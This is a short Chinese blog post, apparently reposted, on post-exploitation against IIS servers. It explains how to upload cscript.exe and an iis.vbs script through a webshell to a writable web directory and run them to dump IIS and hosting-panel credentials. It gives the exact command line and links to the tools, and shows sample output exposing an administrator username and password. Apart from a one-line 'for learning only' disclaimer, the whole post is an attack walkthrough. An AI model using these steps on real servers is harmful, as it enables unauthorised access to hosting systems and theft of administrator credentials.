昔日

渗透提权之读取IIS文件密码

关注网络安全 | 扬天笑's Blog

本文仅供学习参考,温馨提醒:法网无情!

==========分=========割=========线============

利用工具:

      cscript.exe:http://pan.baidu.com/s/1pJwzeht

      iis.vbs: http://pan.baidu.com/s/1ntBwtZj


把这两个工具上传到网站可读可写目录里,然后用大马执行cmd命令

CMD命令1:"C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cscript.exe" d:\freehost\cagj\web\iis.vbs

然后就出现一堆回显,然后自己在里面找管理员账号密码就OK了!

如:

7i24虚拟主机管理平台受控端 administrator asdadmin :80:sys.avzhan.com C:\WINDOWS\7i24.com\FreeHost

账户:administrator

密码:asdadmin

--------------------------------------------------------------------------------------------

i技术论坛:.http://bbs.ijishu.org

网络安全爱好者技术交流平台

评论

热度(3)

  1. 昔日y7xi40 转载了此文字
    关注网络安全 | 扬天笑's Blog
  2. 昔日y7xi40 转载了此文字
  3. h3arky7xi40 转载了此文字